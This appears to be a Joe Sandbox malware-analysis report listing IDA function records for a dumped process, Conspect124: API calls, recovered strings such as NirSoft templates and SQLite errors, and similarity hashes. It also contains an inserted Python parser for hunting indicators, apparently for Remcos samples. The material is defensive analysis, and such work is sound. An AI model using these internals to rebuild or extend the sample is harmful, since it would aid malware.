                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                      • String ID: caption
                                      • API String ID: 973020956-4135340389
                                      • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                      • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                      APIs
                                      Strings
                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf$wcscpy
                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                      • API String ID: 1283228442-2366825230
                                      • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                      • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                      APIs
                                      • wcschr.MSVCRT ref: 00413972
                                      • wcscpy.MSVCRT ref: 00413982
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      • wcscpy.MSVCRT ref: 004139D1
                                      • wcscat.MSVCRT ref: 004139DC
                                      • memset.MSVCRT ref: 004139B8
                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                      • memset.MSVCRT ref: 00413A00
                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                      • wcscat.MSVCRT ref: 00413A27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                      • String ID: \systemroot
                                      • API String ID: 4173585201-1821301763
                                      • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                      • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy
                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                      • API String ID: 1284135714-318151290
                                      • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                      • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                      • String ID: 0$6
                                      • API String ID: 4066108131-3849865405
                                      • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                      • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                      APIs
                                      • memset.MSVCRT ref: 004082EF
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                      • memset.MSVCRT ref: 00408362
                                      • memset.MSVCRT ref: 00408377
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 290601579-0
                                      • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                      • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$wcslen
                                      • String ID:
                                      • API String ID: 3592753638-3916222277
                                      • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                      • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                      APIs
                                      • memset.MSVCRT ref: 0040A47B
                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                      • wcslen.MSVCRT ref: 0040A4BA
                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                      • wcslen.MSVCRT ref: 0040A4E0
                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$_snwprintfmemset
                                      • String ID: %s (%s)$YV@
                                      • API String ID: 3979103747-598926743
                                      • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                      • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                      APIs
                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                      • wcslen.MSVCRT ref: 0040A6B1
                                      • wcscpy.MSVCRT ref: 0040A6C1
                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                      • wcscpy.MSVCRT ref: 0040A6DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                      • String ID: Unknown Error$netmsg.dll
                                      • API String ID: 2767993716-572158859
                                      • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                      • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
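The per-function records above (APIs with call-site refs, recovered strings with xrefs, the memory-dump source, and the Similarity IDs) are what an analyst pivots on when tying a string such as the netmsg.dll error formatter or the nirsoft.net HTML template back to one function in process 0xB's dump at 0x400000. The parser below is an added example, not Joe Sandbox code: its record layout is inferred from the report text in this section, and SAMPLE is a constructed excerpt of two records copied from it, with one "Part of subcall function" line borrowed from another record on the page so that form is exercised too. It also shows why the Similarity "String ID" (strings joined with `$`) should not be used as ground truth when a string itself contains `$`.

```python
"""Parser for the per-function records in Joe Sandbox's IDA plugin section
(the APIs / Strings / Memory Dump Source / Similarity blocks). Added example,
not Joe Sandbox code: the layout is inferred from the report text, and SAMPLE
is a constructed excerpt of two records copied from it."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE = """\
APIs
• LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000), ref: 0040A686
• FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?), ref: 0040A6A4
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF), ref: 0040A6FF
• wcslen.MSVCRT ref: 0040A6B1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2767993716-572158859
• Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
APIs
Strings
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
• <table dir="rtl"><tr><td>, xrefs: 00410B00
Memory Dump Source
• Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230
• Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                    # call-site address inside the dump
    subcall_of: Optional[str]   # parent address for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (text, xref)
    source_file: str = ""
    offset: str = ""
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""

    @property
    def pid(self) -> Optional[int]:
        # First dotted field of the .sdmp name is the process id in hex:
        # 0000000B = 11, the "11" in the snapshot name hcaresult_11_2_400000.
        m = re.match(r"([0-9A-Fa-f]{8})\.", self.source_file)
        return int(m.group(1), 16) if m else None

API_RE = re.compile(r"^(?P<name>[^.(\s]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<parent>[0-9A-Fa-f]{8}): (?P<rest>.*)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-Fa-f]{8})$")
SOURCE_RE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]{8}), based on PE: \w+$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
SIM_FIELDS = {"API ID": "api_id", "String ID": "string_id",
              "API String ID": "api_string_id", "Opcode ID": "opcode_id"}

def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text into records; every 'APIs' header opens a new one."""
    records: List[FunctionRecord] = []
    section, rec = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue  # non-bullet lines (Associated:, Snapshot File:, fuzzy hashes) are skipped
        body = line[1:].strip()
        if section == "APIs":
            parent = None
            if (m := SUBCALL_RE.match(body)):
                parent, body = m.group("parent"), m.group("rest")
            if (m := API_RE.match(body)):
                args = m.group("args")
                rec.apis.append(ApiCall(m.group("name"), m.group("module"),
                                        args.split(",") if args is not None else [],
                                        m.group("ref"), parent))
        elif section == "Strings":
            if (m := STRING_RE.match(body)):
                rec.strings.append((m.group("text"), m.group("xref")))
        elif section == "Memory Dump Source":
            if (m := SOURCE_RE.match(body)):
                rec.source_file, rec.offset = m.group("file"), m.group("off")
        elif section == "Similarity":
            key, _, value = body.partition(": ")  # first ': ' only; values may contain ': '
            if key in SIM_FIELDS:
                setattr(rec, SIM_FIELDS[key], value)
    return records

def find_indicators(records: List[FunctionRecord], needles: List[str]) -> List[Tuple[str, str]]:
    """(opcode_id, string) for each recovered string containing a needle, so a hit
    is tied to one function rather than to the dump as a whole."""
    return [(r.opcode_id, text) for r in records for text, _ in r.strings
            if any(n.lower() in text.lower() for n in needles)]

def string_id_parts(rec: FunctionRecord) -> List[str]:
    """Split the Similarity 'String ID' on its '$' separator. Lossy when a string
    itself contains '$' (the report has IDs such as '4$h' and '($d'), so prefer
    rec.strings, which carry one string per bullet together with its xref."""
    return rec.string_id.split("$") if rec.string_id else []
```

Run it over the whole section text (or the full report) rather than SAMPLE to get one `FunctionRecord` per block; `find_indicators(records, ["nirsoft.net", "netmsg.dll"])` then returns the Opcode IDs of the functions carrying those strings, which is the stable key to compare against other Remcos samples' reports.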
                                      APIs
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 0040DAFB
                                      • wcscpy.MSVCRT ref: 0040DB0B
                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                      • API String ID: 3176057301-2039793938
                                      • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                      • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                      APIs
                                      Strings
                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                      • database is already attached, xrefs: 0042F721
                                      • database %s is already in use, xrefs: 0042F6C5
                                      • unable to open database: %s, xrefs: 0042F84E
                                      • too many attached databases - max %d, xrefs: 0042F64D
                                      • out of memory, xrefs: 0042F865
                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                      • API String ID: 1297977491-2001300268
                                      • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                      • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                      • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                      • String ID: ($d
                                      • API String ID: 1140211610-1915259565
                                      • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                      • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                      APIs
                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                      • GetLastError.KERNEL32 ref: 004178FB
                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockSleepUnlock
                                      • String ID:
                                      • API String ID: 3015003838-0
                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                      APIs
                                      • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                      • GetLastError.KERNEL32 ref: 0041855C
                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                      • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                      • GetLastError.KERNEL32 ref: 0041858E
                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                      • free.MSVCRT ref: 004185AC
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$AttributesDeleteErrorLastSleep$free
                                      • String ID:
                                      • API String ID: 2802642348-0
                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
